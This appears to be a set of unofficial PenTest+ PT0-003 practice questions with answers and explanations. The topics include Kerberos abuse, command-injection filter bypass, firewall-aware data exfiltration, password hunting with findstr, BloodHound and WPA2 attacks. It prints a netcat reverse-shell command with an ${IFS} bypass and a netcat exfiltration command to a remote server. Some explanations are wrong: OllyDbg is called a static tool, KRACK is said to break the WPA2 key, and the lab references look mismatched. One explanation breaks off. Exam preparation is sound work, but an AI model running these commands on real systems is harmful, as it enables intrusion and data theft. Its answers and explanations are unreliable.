Practice Free PT0-003 Exam Online Questions
A penetration tester compromises a Windows OS endpoint that is joined to an Active Directory local environment.
Which of the following tools should the tester use to manipulate authentication mechanisms to move laterally in the network?
- A . Rubeus
- B . WinPEAS
- C . NTLMRelayX
- D . Impacket
A
Explanation:
Rubeus is a post-exploitation tool used for Kerberos abuse, including ticket extraction, pass-the-ticket, ticket renewal, and Kerberoasting. It’s ideal for lateral movement within Active Directory environments.
WinPEAS is mainly used for local privilege escalation and enumeration.
NTLMRelayX (from Impacket) is useful for relaying NTLM authentication but is not focused on Kerberos.
Impacket is a collection of tools; Rubeus is more targeted for Kerberos attacks.
Reference: PT0-003 Objective 4.2 - Tools and techniques for lateral movement and manipulating authentication in Windows AD environments.
Which of the following frameworks can be used to classify threats?
- A . PTES
- B . STRIDE
- C . OSSTMM
- D . OCTAVE
B
Explanation:
STRIDE is a threat classification model created by Microsoft that breaks down threats into six categories:
Spoofing
Tampering
Repudiation
Information disclosure
Denial of Service
Elevation of privilege
It is specifically designed for threat modeling.
PTES is a general pentesting methodology.
OSSTMM is a framework for operational security testing.
OCTAVE is a risk assessment methodology, not focused on threat classification.
Reference: PT0-003 Objective 3.1 - Understand and apply threat modeling methodologies like STRIDE.
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability.
The tester uses the following command:
nc -e /bin/sh 10.10.10.16 4444
Which of the following would most likely bypass the filtered space character?
- A . ${IFS}
- B . %0a
- C . +
- D . %20
A
Explanation:
To bypass a command injection blocklist that filters out the space character, the tester can use ${IFS}. ${IFS} stands for Internal Field Separator in Unix-like systems, which by default is set to space, tab, and newline characters.
Command Injection:
Command injection vulnerabilities allow attackers to execute arbitrary commands on the host operating system via a vulnerable application.
Filters or blocklists are often implemented to prevent exploitation by disallowing certain characters like spaces.
Bypassing Filters:
${IFS}: Using ${IFS} instead of a space can bypass filters that block spaces. ${IFS} expands to a space character in shell commands.
Example: The command nc -e /bin/sh 10.10.10.16 4444 can be rewritten as nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444.
Alternative Encodings:
%0a: Represents a newline character in URL encoding.
+: Sometimes used in place of space in URLs.
%20: URL encoding for space.
However, ${IFS} is most appropriate for shell command contexts.
Pentest Reference: Command Injection: Understanding how command injection works and common techniques to exploit it.
Bypassing Filters: Using creative methods like environment variable expansion to bypass input filters and execute commands.
Shell Scripting: Knowledge of shell scripting and environment variables is crucial for effective exploitation.
By using ${IFS}, the tester can bypass the filtered space character and execute the intended command, demonstrating the vulnerability’s exploitability.
During an assessment, a penetration tester wants to extend the vulnerability search to include the use of dynamic testing.
Which of the following tools should the tester use?
- A . Mimikatz
- B . ZAP
- C . OllyDbg
- D . SonarQube
B
Explanation:
Dynamic Application Security Testing (DAST):
Definition: DAST involves testing the application in its running state to identify vulnerabilities that could be exploited by an attacker.
Purpose: Simulates attacks on a live application, examining how it behaves and identifying security weaknesses.
ZAP (Zed Attack Proxy):
Description: An open-source DAST tool developed by OWASP.
Features: Capable of scanning web applications for vulnerabilities, including SQL injection, XSS, CSRF, and other common web application vulnerabilities.
Usage: Ideal for dynamic testing as it interacts with the live application and identifies vulnerabilities that may not be visible in static code analysis.
Other Tools:
Mimikatz: Used for post-exploitation activities, specifically credential dumping on Windows systems.
OllyDbg: A debugger used for reverse engineering and static analysis of binary files, not suitable for dynamic testing.
SonarQube: A static code analysis tool used for SAST (Static Application Security Testing), not for dynamic testing.
Pentest Reference: Web Application Security Testing: Utilizing DAST tools like ZAP to dynamically test and find vulnerabilities in running web applications.
OWASP Tools: Leveraging open-source tools recommended by OWASP for comprehensive security testing.
By using ZAP, the penetration tester can perform dynamic testing to identify runtime vulnerabilities in web applications, extending the scope of the vulnerability search.
A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:
| Action | SRC | DEST | Protocol |
| --- | --- | --- | --- |
| Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCP |
| Allow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24 : 443 | TCP |
| Allow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0 : 443 | TCP |
| Block | * | * | * |
Which of the following commands should the tester try next?
- A . tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
- B . gzip /path/to/data && cp data.gz <remote_server> 443
- C . gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
- D . tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
A
Explanation:
Given the firewall policy, let’s analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic.
The firewall policy rules are:
Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).
Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).
Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).
Block: All other traffic (*).
Breakdown of Options:
Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
This command compresses the data into a tar.gz file and uses nc (netcat) to send it to a remote server on port 443.
Since the firewall allows outbound connections on port 443 (both within and outside the subnet 192.168.10.0/24), this command adheres to the policy and is the correct choice.
Option B: gzip /path/to/data && cp data.gz <remote_server> 443
This command compresses the data but attempts to copy it directly to a server, which is not a valid command. The cp command does not support network operations in this manner.
Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
This command attempts to listen on port 443 and then send data over port 22. However, outbound connections to port 22 are blocked by the firewall, making this command invalid.
Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
This command uses scp to copy the file, which typically uses port 22 for SSH. Since the firewall blocks port 22, this command will not work.
Reference from Pentest:
Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A.
Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.
Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.
While conducting an assessment, a penetration tester identifies details for several unreleased products announced at a company-wide meeting.
Which of the following attacks did the tester most likely use to discover this information?
- A . Eavesdropping
- B . Bluesnarfing
- C . Credential harvesting
- D . SQL injection attack
A
Explanation:
The tester gained information by listening to a private discussion, which is eavesdropping (passive reconnaissance).
Option A (Eavesdropping) ✅ : Correct.
Involves intercepting conversations via audio, network traffic, or wireless signals.
Option B (Bluesnarfing) ❌ : Stealing data via Bluetooth, which is not mentioned.
Option C (Credential harvesting) ❌ : No password collection occurred.
Option D (SQL injection) ❌ : SQLi affects databases, not voice communications.
Reference: CompTIA PenTest+ PT0-003 Official Guide - OSINT & Eavesdropping Techniques
During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:
findstr /SIM /C: "pass" *.txt *.cfg *.xml
Which of the following is the penetration tester trying to enumerate?
- A . Configuration files
- B . Permissions
- C . Virtual hosts
- D . Secrets
D
Explanation:
By running the command findstr /SIM /C: "pass" *.txt *.cfg *.xml, the penetration tester is trying to enumerate secrets.
Command Analysis:
findstr: A command-line utility in Windows used to search for specific strings in files.
/SIM: Combination of options; /S searches for matching files in the current directory and all subdirectories, /I specifies a case-insensitive search, and /M prints only the filenames with matching content.
/C: "pass": Searches for the literal string "pass".
*.txt *.cfg *.xml: Specifies the file types to search within.
Objective:
The command is searching for the string "pass" within .txt, .cfg, and .xml files, which is indicative of searching for passwords or other sensitive information (secrets).
These file types commonly contain configuration details, credentials, and other sensitive data that might include passwords or secrets.
Other Options:
Configuration files: While .cfg and .xml files can be configuration files, the specific search for "pass" indicates looking for secrets like passwords.
Permissions: This command does not check or enumerate file permissions.
Virtual hosts: This command is not related to enumerating virtual hosts.
Pentest Reference: Post-Exploitation: Enumerating sensitive information like passwords is a common post-exploitation activity after gaining initial access.
Credential Discovery: Searching for stored credentials within configuration files and documents to escalate privileges or move laterally within the network.
By running this command, the penetration tester aims to find stored passwords or other secrets that could help in further exploitation of the target system.
During an assessment, a penetration tester compromises some machines but finds that none of the accounts have sufficient access to the target HR database server. In order to enumerate accounts with sufficient permissions, the tester wants to model an attack path before taking further action.
Which of the following tools should the tester use to meet this objective?
- A . Responder
- B . Mimikatz
- C . Hydra
- D . BloodHound
- E . TruffleHog
D
Explanation:
BloodHound is a tool designed for Active Directory attack path analysis.
It enumerates relationships between users, groups, and computers, showing how a low-privileged account can escalate privileges to high-value targets (like the HR database server).
This exactly matches the tester’s objective: modeling attack paths to accounts with sufficient permissions.
Why not the others?
A penetration tester performs an assessment on the target company’s Kubernetes cluster using kube-hunter.
Which of the following types of vulnerabilities could be detected with the tool?
- A . Network configuration errors in Kubernetes services
- B . Weaknesses and misconfigurations in the Kubernetes cluster
- C . Application deployment issues in Kubernetes
- D . Security vulnerabilities specific to Docker containers
B
Explanation:
kube-hunter is a tool designed to perform security assessments on Kubernetes clusters. It identifies various vulnerabilities, focusing on weaknesses and misconfigurations.
Here's why option B is correct:
Kube-hunter: It scans Kubernetes clusters to identify security issues, such as misconfigurations, insecure settings, and potential attack vectors.
Network Configuration Errors: While kube-hunter might identify some network-related issues, its primary focus is on Kubernetes-specific vulnerabilities and misconfigurations.
Application Deployment Issues: These are more related to the applications running within the cluster, not the cluster configuration itself.
Security Vulnerabilities in Docker Containers: Kube-hunter focuses on the Kubernetes environment rather than Docker container-specific vulnerabilities.
Reference from Pentest:
Forge HTB: Highlights the use of specialized tools to identify misconfigurations in environments, similar to how kube-hunter operates within Kubernetes clusters.
Anubis HTB: Demonstrates the importance of identifying and fixing misconfigurations within complex environments like Kubernetes clusters.
Conclusion:
Option B, weaknesses and misconfigurations in the Kubernetes cluster, accurately describes the type of vulnerabilities that kube-hunter is designed to detect.
During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption.
Which of the following attacks would accomplish this objective?
- A . ChopChop
- B . Replay
- C . Initialization vector
- D . KRACK
D
Explanation:
To break the key for a Wi-Fi network that uses WPA2 encryption, the penetration tester should use the KRACK (Key Reinstallation Attack) attack.
KRACK (Key Reinstallation Attack):
Definition: KRACK is a vulnerability in the WPA2 protocol that allows attackers to decrypt and potentially inject packets into a Wi-Fi network by manipulating and replaying cryptographic handshake messages.
Impact: This attack exploits flaws in the WPA2 handshake process, allowing an attacker to break the encryption and gain access to the network.
Other Attacks:
ChopChop: Targets WEP encryption, not WPA2.
Replay: Involves capturing and replaying packets to create effects such as duplicating transactions; it does not break WPA2 encryption.
Initialization Vector (IV): Related to weaknesses in WEP, not WPA2.
Pentest Reference: Wireless Security: Understanding vulnerabilities in Wi-Fi encryption protocols, such as WPA2, and how they can be exploited.
KRACK Attack: A significant vulnerability in WPA2 that requires specific techniques to exploit.
By using the KRACK attack, the penetration tester can break WPA2 encryption and gain unauthorized access to the Wi-Fi network.